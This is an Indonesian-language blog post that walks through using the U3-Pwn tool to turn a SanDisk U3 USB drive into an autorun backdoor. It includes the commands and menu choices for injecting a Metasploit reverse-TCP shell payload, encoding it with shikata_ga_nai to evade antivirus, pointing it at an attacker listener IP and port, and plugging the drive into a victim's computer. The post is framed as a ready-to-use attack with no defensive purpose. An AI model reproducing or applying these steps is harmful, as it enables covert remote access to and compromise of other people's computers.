8.17.2012

U3 UFD Pawned

 Ditahun-tahun yang lalu kita mungkin masih mengingat UFD yang memiliki U3 chipset dapat digunakan sebagai usb tools hacking. beberapa diantaranya dikenal sebagai USB switchblade dan USB Hacksaw dimana program tertentu diinjeksikan kedalam chipset u3 untuk "mengemulasikan cdrom drive" yang akan mengeksekusi program yg diinjeksikan tersebut (autoplay). output yg dihasilkan oleh program ini berupa informasi2 hash password LSA, IP information, browser history hingga cookie auto fill information.

U3 Pawn masih menggunakan metode yang sama dengan usb switchblade, akan tetapi code program di injeksikan bukan ditujukan untuk memanen informasi2 dari komputer korban melainkan membuat/menjalankan backdoor pada port tertentu. Uniknya proses yang dijalankan berada didumping memory (tidak membuat file baru di komputer korban) sehingga saat dilepas dari komputer korban background prosesnya masih tetapa berjalan selama masih dalam sesi yang sama (tidak di restart)..

 Requirement    :
  • UFD yang mendukung U3, ex: UFD bermerk Sandisk, Kingston (tipe lama)...
  • Linux yg memiliki Metasploit (ex: Backtrack)
  • U3 Tool (ada di repo Backtrack)
  • U3 Pwn.tar.gz (http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz)

The step:
- Masukkan UFD U3 anda ke usb port.
- Install U3 tool kedalam Linux anda
apt-get install u3-tool

- Download U3 Pwn.tar.gz
wget http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz

- Ekstrak U3-Pwn.tar.gz
wget tar xzvf U3-Pwn.tar.gz

- Jalankan U3-pwn.tar.gz
cd  /root/U3-Pwn
python U3-Pwn.py

- Pilih 1 untuk men-Generate & Replace Iso Image
Enter the number: 1

- Pilih 1 untuk memilih payload exploit (Windows Shell Reverse_TCP) yang akan dijalankan
   Enter number: 1


- Pilih 2 untuk memilih shikata_ga_nai sebagai encoder untuk melewati firewall dan antivirus.
Enter the number: 1

- Masukkan no ip host anda serta port backdoorny, ip lan atau bisa juga ip publik yang anda dapatkan dari ISP
ex: dalam kasus ini saya menggunakan backtrack sebagai host  yang mendapatkan ip  192.168.56.101 sedangkan korban memiliki IP 192.168.56.1
 Enter Ip Address for reverse listener: 192.168.56.101

 Enter the port of the Listener: 4444

- Masukkan letak UFD di linux ex:sdb1
   Enter the device to change iso image on (example /dev/sde1): /dev/sdb1

                                                                             
          ~    .__ °.__   0       o                    ^   .__ °__  `´       
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__. 
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  | 
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O| 
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____| 
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´ 

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************


  Generating Shellcode Please Wait...
|**************************************************| 100%
OK


- Pilih yes untuk menjalan exploit handler
Do you want to start a listener to receive the payload yes or no: yes

- Unplug UFD
- Masukkan UFD ke komputer korban
- Tunggu beberapa saat dan komputer korban akan membuka backdoornya untuk komputer host....selanjutnya terserah anda...:))


related link:
http://packetstormsecurity.org/files/114502/U3-Pwn-Sandisk-Executable-Injection-Tool.html

Twitter Delicious Facebook Digg Stumbleupon Favorites More